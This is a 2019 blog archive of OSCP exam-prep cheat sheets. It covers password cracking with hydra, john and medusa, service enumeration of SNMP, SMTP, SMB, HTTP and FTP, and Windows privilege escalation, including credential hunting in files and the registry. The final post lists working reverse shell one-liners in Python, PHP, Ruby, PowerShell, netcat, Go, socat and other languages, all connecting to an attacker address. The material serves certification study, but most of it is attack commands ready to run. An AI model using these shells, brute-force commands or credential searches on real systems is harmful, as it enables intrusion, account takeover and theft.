Translate

Friday, 18 October 2019

OSCP- Password Cracking

John The Ripper

To crack linux system password suing john & rockyou.txt

First, download the passwd & shadow files from the victim machine

unshadow passwd shadow > unshadowed
john unshadowed --wordlist=~/Downloads/rockyou.txt

Hydra

To crack SSH

hydra -L <username_list.txt> -P <password_lis.txt> <ip> ssh -s 22 -t 10

To crack WebApps
hydra -l <username> -P <password list> <Target hostname> <service module> <post request parameters>[/code]
hydra -l admin -P /usr/share/wordlists/rockyou.txt www.vulnwebsite.com http-post-form "/Login.asp:UserName=^USER^&UserPass=^PASS^:S=Login Failed" -vV -f

Medusa

medusa -h <ip> -u guest -P passwords.txt -M ftp

Ncrack


ncrack -vv --user admin -P passwords rdp://<ip>


Thursday, 17 October 2019

OSCP- Enumeration SNMP

SNMP - Simple Network Mapping Protocol- Port 161

Enumeration:

1) nc <victim_ip> 161

2) telnet <victim_ip> 161

3) nmap

nmap --script snmp-info,snmp-brute,snmp-interfaces,snmp-processes,snmp-win32-users,snmp-win32-software,snmp-win32-shares,snmp-win32services <victim_ip> -p161
4)snmpwalk

snmpwalk -c public -v1 <victim_ip> #community string and which version
MIB-Management Information Base codes

1.3.6.1.2.1.25.1.6.0 System Processes
1.3.6.1.2.1.25.4.2.1.2 Running Programs
1.3.6.1.2.1.25.4.2.1.4 Processes Path
1.3.6.1.2.1.25.2.3.1.4 Storage Units
1.3.6.1.2.1.25.6.3.1.2 Software Name
1.3.6.1.4.1.77.1.2.25 User Accounts
1.3.6.1.2.1.6.13.1.3 TCP Local Ports

5) snmp-check

snmp-check -t 192.168.1.101 -c public
6) Onesixtyone

onesixtyone <victim_ip> -c <community file name to try>


Exploitation:


use "exploit-db.com" to find the latest exploits for snmp

Friday, 11 October 2019

OSCP- Enumeration SMTP

SMTP - Simple Mail Transfer Protocol- Port 25

Possible SMTP commands

HELO - 
EHLO - Extended SMTP.
STARTTLS - SMTP communicted over unencrypted protocol. By starting TLS-session we encrypt the traffic.
RCPT - Address of the recipient.
DATA - Starts the transfer of the message contents.
RSET - Used to abort the current email transaction.
MAIL - Specifies the email address of the sender.
QUIT - Closes the connection.
HELP - Asks for the help screen.
AUTH - Used to authenticate the client to the server.
VRFY - Asks the server to verify is the email user's mailbox exists.
Enumeration:

1) nc <ip> 25

    VRFY

2) nmap


nmap –script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1


3) telnet <ip> 25

4) smtp-user-enum


smtp-user-enum -M VRFY -U /root/sectools/SecLists/Usernames/Names/names.txt -t <victim_ip>

5) iSMTP


ismtp -h <victim_ip>:25 -e /root/Downloads/email.txt
6) Metasploit


use auxiliary/scanner/smtp/smtp_enum 
msf auxiliary(smtp_enum) > set rhosts <victim_ip>
msf auxiliary(smtp_enum) > set rport 25 
msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/user.txt 
msf auxiliary(smtp_enum) > exploit

Exploitation:

Common Exploits:

https://www.exploit-db.com/exploits/34896
https://www.exploit-db.com/exploits/41672
https://www.exploit-db.com/exploits/23113




Thursday, 10 October 2019

OSCP- Enumeration SMB


SMB - Simple Message Block- Port 445


Enumeration:

Vulnerability scan

nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 10.10.10.10
Users & Shares scan
nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.10
Enum4linux
enum4linux -a 10.10.10.10
Null connect

rpcclient -U "" 10.10.10.10
To connect to SMB


smbclient //MOUNT/share
smbclient -L <ip>

Wireshark - Analyze the wireshark packets for SMB version and other information



Exploitation:


1) Default password check while connecting to SMB
admin/admin, administrator/administrator, test/test, user/user, etc.,


2) Common Exploits


MS08-067 (windows) - https://www.exploit-db.com/exploits/40279/
Samba 2.2.7a (Linux) - https://www.exploit-db.com/exploits/10/
EternalBlue (windows) - https://www.exploit-db.com/exploits/42315 




Wednesday, 9 October 2019

OSCP- Enumeration HTTP/HTTPS


HTTP- Hyper Text Transfer Protocol - Port 80
HTTPs- Hyper Text Transfer Protocol secure - Port 443



1) Heart Bleed

sudo sslscan 192.168.101.1:443

nmap -sV --script=ssl-heartbleed 192.168.101.8


2) nc <ip> <port>

3) nmap --script dns-brute,http-backup-finder,http-config-backup,http-rfi-spider,http-brute,http-default-accounts,http-put,http-enum

4) nikto -h <ip>

5) dirb http://<ip>
  wordlist-
     /usr/share/wordlists/dirb/common.txt
/usr/share/wordlists/dirb/big.txt


6) Check for Robots file:
   curl -i <ip>robots.txt   (or)
   parsero -u http://<ip>


7) Check the source code and comments in the source code for any valuable information.

8) Try default credentials for login/ admin pages
    admin/admin, administrator/administrator,test/test,user/user,user1/user1, etc


9) For wordpress
     wpscan -u <ip>/wp/

10) In all Parameters (also headers & cookies), check for SQL, XSS, LFI/ RFI



Monday, 7 October 2019

OSCP- Enumeration FTP


FTP- File Transfer Protocol

Port number- 20 --> Data Transfer
                      21 --> Control

FTP protocol is used to transfer files from one machine to another machine. We can easily transfer data from one machine to another machine. It works in Client-Server model ie. file from Server will be transferred to the Client.


Famous FTP servers are: ProFTPD, vsftpd, PureFTPd, FileZilla. etc

Connect to a FTP server:

ftp <ip victim>
nc -nv <ip victim>



How to exploit an FTP server:


1. Try using default credentials
           anonymous: anonymous
           admin: admin
           administrator: administrator


2.  Enumeration

      nmap

f–script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum,ftp-default,ftp-user-enum


3. Finding exploits
           Common exploits for RCE, Directory Traversal, Credential Disclosure, Arbitrary File upload, SQL Injection, and Buffer Overflow.

   search for exploits
           searchsploit <web server name, version>
           https://www.exploit-db.com/



4. Brute Force


medusa -h 10.10.10.10 -u user -P passwords.txt -M ftp 
hydra -s [PORT] -C ./wordlists/ftp-default-userpass.txt -u -f [IP] ftp






Sunday, 6 October 2019

OSCP- Privilege Escalation Windows


1) Kernel Exploits:

Download windows exploit suggester and update the database excel sheet

Enter 'systeminfo' command in the victim machine, copy the output to a text file eg. sysinfo_victim.txt

./windows-exploit-suggester.py --database latest_databse_file_mssb.xlsx --systeminfo sysinfo_victim.txt

2) Search for clear passwords:

In files-

dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b 

dir c:\ /s /b | findstr /si *vnc.ini

c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml


Search for passwords-

--> Find all passwords in all files.
findstr /spin "password" *.*

findstr /spin "password" *.*

--> Find all those strings in config files.
dir /s *pass* == *cred* == *vnc* == *.config*

findstr /si password *.txt
findstr /si password *.xml

findstr /si password *.ini


In Registry-

—> VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"

—> Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

—> SNMP Paramters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

—> Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

—> Search for password in registry
reg query HKLM /f password /t REG_SZ /s

reg query HKCU /f password /t REG_SZ /s


3) Always Install Elevated:

To check if alwaysinstallelevated is enabled-

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

'The system was unable to find the specified registry key or value' means that the 'AlwaysInstallElevated' is not enabled.

If it is enabled, use msfvenom to generate .msi file, to install and get a reverse shell as Administrator.


 msfvenom -p windows/adduser USER=hacker PASS=myPass -f msi -o escalate.msi


4) Trusted Service Path

To check-

using wmic

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
using sc

sc query
sc qc service name
look for binaries path name with space eg. 'C:\Program Files\Anti Virus\bin\scanner.exe'

To Exploit-

Generate a reverse shell in .exe extension using msfvenom, name it as Anti.exe, for example. Save it in "C:\Program Files\Anti,exe"

Now, restart the application to run the generated Anti.exe

sc stop scanner.exe
sc start scanner.exe

5)Services only available inside the victim machine

To check-

netstat -ano

To exploit-

Port forward the service to exploit it

—> Port forward using plink
plink.exe -l attacker_username -pw attacker_pass <attackerip> -R 8080:127.0.0.1:8080

—> Port forward using meterpreter
portfwd add -l <attacker port> -p <victim port> -r <victim ip>
portfwd add -l 3306 -p 3306 -r 192.168.1.101



Saturday, 5 October 2019

OSCP - Non Meterpreter Reverse Shell Cheatsheet



Non-Meterpreter Shells

1. Python:

Linux-
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Windows-
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.10.10.10', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"

2. PHP:
php -r '$sock=fsockopen("<attacher_ip>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'


3. Ruby:

Linux-
ruby -rsocket -e'f=TCPSocket.open("<attacher_ip>",<port>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("<attacher_ip>","<port>");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Windows-
ruby -rsocket -e 'c=TCPSocket.new("<attacher_ip>","<port>");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'


4. Powershell:
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("<attacher_ip>",<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<attacher_ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"


5. Awk:
awk 'BEGIN {s = "/inet/tcp/0/attacher_ip>/port"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null


6. Java:
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<attacher_ip>/<port>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])p.waitFor()



7. NetCat:
nc -e /bin/sh <attacher_ip> <port>

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacher_ip> <port> >/tmp/f



8. Golang:

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","<attacher_ip>:<port>");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go


9. SOCAT:

Attacker
socat file:`tty`,raw,echo=0 TCP-L:<port>

Victim
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<attacher_ip>:<port>